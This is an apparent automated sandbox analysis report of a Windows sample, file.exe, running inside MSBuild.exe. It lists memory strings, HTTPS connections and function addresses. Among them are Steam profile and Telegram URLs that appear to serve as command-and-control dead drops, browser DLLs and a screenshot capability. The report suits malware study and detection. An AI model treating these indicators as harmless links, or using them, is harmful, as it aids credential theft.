Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HCAEHD.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HCAEHD.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HCAEHD.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: BAECFC.4.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.n
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869f
Source: file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.ste
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DBKKFC.4.dr	String found in binary or memory: https://support.mozilla.org
Source: DBKKFC.4.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DBKKFC.4.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, file.exe, 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: HCAEHD.4.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: HCAEHD.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/re
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: DBKKFC.4.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56239
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56242
Source: unknown	Network traffic detected: HTTP traffic on port 56242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56245
Source: unknown	Network traffic detected: HTTP traffic on port 56239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56241
Source: unknown	Network traffic detected: HTTP traffic on port 56258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56252
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56265
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56266
Source: unknown	Network traffic detected: HTTP traffic on port 56244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56262
Source: unknown	Network traffic detected: HTTP traffic on port 56237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56263
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

4_2_00411F55

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	4_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C8EB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EB8C0 rand_s,NtQueryVirtualMemory,	4_2_6C8EB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	4_2_6C8EB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6C88F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006120AD	0_2_006120AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066509B	0_2_0066509B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00659251	0_2_00659251
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065434A	0_2_0065434A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006513E2	0_2_006513E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006293D2	0_2_006293D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00665439	0_2_00665439
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006535EA	0_2_006535EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00626625	0_2_00626625
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066580B	0_2_0066580B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00665BF3	0_2_00665BF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00664C06	0_2_00664C06
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00611E05	0_2_00611E05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041C472	4_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042D933	4_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042D1C3	4_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042D561	4_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041950A	4_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042DD1B	4_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042CD2E	4_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041B712	4_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8835A0	4_2_6C8835A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C896C80	4_2_6C896C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E34A0	4_2_6C8E34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EC4A0	4_2_6C8EC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8964C0	4_2_6C8964C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AD4D0	4_2_6C8AD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88D4E0	4_2_6C88D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C6CF0	4_2_6C8C6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8FAC00	4_2_6C8FAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C5C10	4_2_6C8C5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D2C10	4_2_6C8D2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F542B	4_2_6C8F542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C895440	4_2_6C895440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F545C	4_2_6C8F545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C0DD0	4_2_6C8C0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E85F0	4_2_6C8E85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89FD00	4_2_6C89FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B0512	4_2_6C8B0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AED10	4_2_6C8AED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8EE680	4_2_6C8EE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A5E90	4_2_6C8A5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E4EA0	4_2_6C8E4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F76E3	4_2_6C8F76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88BEF0	4_2_6C88BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C89FEF0	4_2_6C89FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D5600	4_2_6C8D5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C7E10	4_2_6C8C7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8E9E30	4_2_6C8E9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D2E4E	4_2_6C8D2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A4640	4_2_6C8A4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A9E50	4_2_6C8A9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C3E50	4_2_6C8C3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F6E63	4_2_6C8F6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88C670	4_2_6C88C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D77A0	4_2_6C8D77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C88DFE0	4_2_6C88DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B6FF0	4_2_6C8B6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C899F00	4_2_6C899F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C7710	4_2_6C8C7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8B60A0	4_2_6C8B60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8F50C7	4_2_6C8F50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AC0E0	4_2_6C8AC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8C58E0	4_2_6C8C58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C897810	4_2_6C897810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CB820	4_2_6C8CB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8D4820	4_2_6C8D4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8A8850	4_2_6C8A8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8AD850	4_2_6C8AD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8CF070	4_2_6C8CF070
